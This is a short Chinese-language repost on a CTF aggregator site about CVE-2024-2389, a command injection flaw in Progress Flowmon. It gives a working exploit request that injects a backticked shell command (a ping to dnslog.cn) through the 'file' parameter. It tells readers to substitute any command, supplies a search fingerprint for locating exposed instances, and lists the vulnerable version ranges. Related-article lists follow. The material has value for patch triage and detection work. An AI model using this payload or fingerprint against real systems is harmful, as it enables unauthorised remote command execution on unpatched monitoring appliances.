CTF导航 CTF导航

Progress Flowmon 任意命令执行漏洞 CVE-2024-2389

渗透技巧 2周前 admin
37 0 0

漏洞名称

Progress Flowmon 任意命令执行漏洞 CVE-2024-2389


漏洞复现

1、替换需要执行的命令,发送请求

GET /service.pdfs/confluence?lang=en&file=`ping dnslog.cn` HTTP/1.1Host: 1.1.1.1

搜索指纹

title=”Flowmon Web Interface”



利用条件

11.x < Progress Flowmon < 11.1.14

12.x < Progress Flowmon < 12.3.5

Progress Flowmon 任意命令执行漏洞 CVE-2024-2389


免责声明



本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。


长按下方二维码,关注巨黑科,学习漏洞信息!

原文始发于微信公众号(巨黑科):Progress Flowmon 任意命令执行漏洞 CVE-2024-2389

版权声明:admin 发表于 2024年4月27日 上午8:01。
转载请注明:Progress Flowmon 任意命令执行漏洞 CVE-2024-2389 | CTF导航

相关文章

漏洞空间站上线啦!CVE-2022-0540 Atlassian JIRA存在认证绕过漏洞影响范围广泛
admin
978
Java安全之ysoserial JRMP分析
admin
183
PHP Phar反序列化浅学习
admin
1,204
新一代Kerberos攻击 | 钻石票据与蓝宝石票据
admin
365
[论文分享]Space Traveling across VM
admin
22
Alchimist: A new attack framework in Chinese for Mac, Linux and Windows
admin
638

相关文章

shell.openExternal | Electron 安全
0
每日安全动态推送(5-8)
0
Lethal Injection: How We Hacked Microsoft’s Healthcare Chat Bot
0
使用 Microsoft Entra 临时访问通行证进行横向移动和本地 NT 哈希转储
0
漏洞挖掘 | 使用HaE与CaA组合挖掘高危漏洞
0
每日安全动态推送(5-7)
0
Java 应用安全之 JEB Floating License 绕过
0
代码审计之某高校通用系统getRequsetURI函数的三次鉴权绕过
0
C2 Cloud
0
Send()-ing Myself Belated Christmas Gifts – GitHub.com’s Environment Variables & GHES Shell
0